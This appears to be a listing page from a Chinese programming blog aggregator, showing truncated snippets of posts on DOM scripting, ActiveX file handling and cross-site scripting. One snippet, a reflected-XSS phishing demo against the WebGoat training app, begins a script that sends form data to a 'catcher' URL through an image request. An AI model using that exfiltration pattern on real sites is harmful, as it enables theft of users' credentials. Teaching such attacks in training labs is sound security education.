本章内容 一、一个为文档创建“缩略词语表”的函数 二、一个为文档创建“文献来源链接”的函数 三、一个为文档创建“快速访问键清单”的函数 利用DOM动态的收集和创建一些有用的辅助信息,并把它们呈现在网页上的基本思路: 1、把隐藏在属性里的信息检索出来(遍历、提取) 2、把这些信息动态的创建为一些htm ...
分类:
其他好文 时间:
2016-11-17 01:22:35
阅读次数:
180
1. 写入 FileSystemObject可以将文件翻译成文件流。 第一步: 例: 代码如下: Var fso=new ActiveXObject(Scripting.FileSystemObject); 创建一个可以将文件翻译成文件流的对象。 第二步:用于创建一个textStream 对象 括号 ...
分类:
编程语言 时间:
2016-11-12 22:40:29
阅读次数:
193
Computer Science An Overview _J. Glenn Brookshear _11th Edition A subset of the imperative programming languages is the collection of languages known ...
分类:
其他好文 时间:
2016-11-09 11:13:16
阅读次数:
218
Web安全XSS Web安全XSS 简单的反射型XSS钓鱼演示 </form> <script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes ...
分类:
Web程序 时间:
2016-11-08 19:37:05
阅读次数:
208
本章内容: 1、动态创建html内容的“老”技巧:document.write()和innerHTML属性 2、DOM方法:createElement(),creatTextNode(),appendChild(),insertBefore(). 一、document.write() 语法:docu ...
分类:
Web程序 时间:
2016-11-08 13:24:10
阅读次数:
170
XSS(Cross Site Scripting),又称跨站脚本,XSS的重点不在于跨站点,而是在于脚本的执行。在WEB前端应用日益发展的今天,XSS漏洞尤其容易被开发人员忽视,最终可能造成对个人信息的泄漏。如今,仍然没有统一的方式来检测XSS漏洞,但是对于前端开发人员而言,仍是可以在某些细微处避免 ...
分类:
其他好文 时间:
2016-11-07 00:48:44
阅读次数:
330
第四章的案例代码可以得到更好的改进。例如:预留退路、向后兼容性和分离js。 原html代码: 原js代码: 一、解决预留退路问题: 没有使用js伪协议,即使js功能被禁用,a链接仍可以链接到图片,虽然与js在当前页面上切换显示新图片的效果略差一些,但网页的基本功能没有受到损害,页面上的所有内容都可以 ...
分类:
其他好文 时间:
2016-11-03 21:02:49
阅读次数:
278
view plain<script language="javascript" type="text/javascript">//读文件function readFile(filename){var fso = new ActiveXObject("Scripting.FileSystemObjec ...
分类:
Web程序 时间:
2016-11-03 09:34:22
阅读次数:
691
ZC: 我在公司 买的书 1、<<Oracle数据高可用之路>> 中国工信出版社 贾代平,吴丽娟 著 2、<<Linux命令行与shell脚本编程大全>>(第2版) (Linux Command Line and Shell Scripting Bible [Second Edition]) 人民邮 ...
分类:
其他好文 时间:
2016-11-02 17:46:53
阅读次数:
267
转载:http://www.51testing.com/html/44/15020244-908645.html Web安全测试之XSS Web安全测试之XSS XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如 ...
分类:
Web程序 时间:
2016-11-01 11:26:22
阅读次数:
267
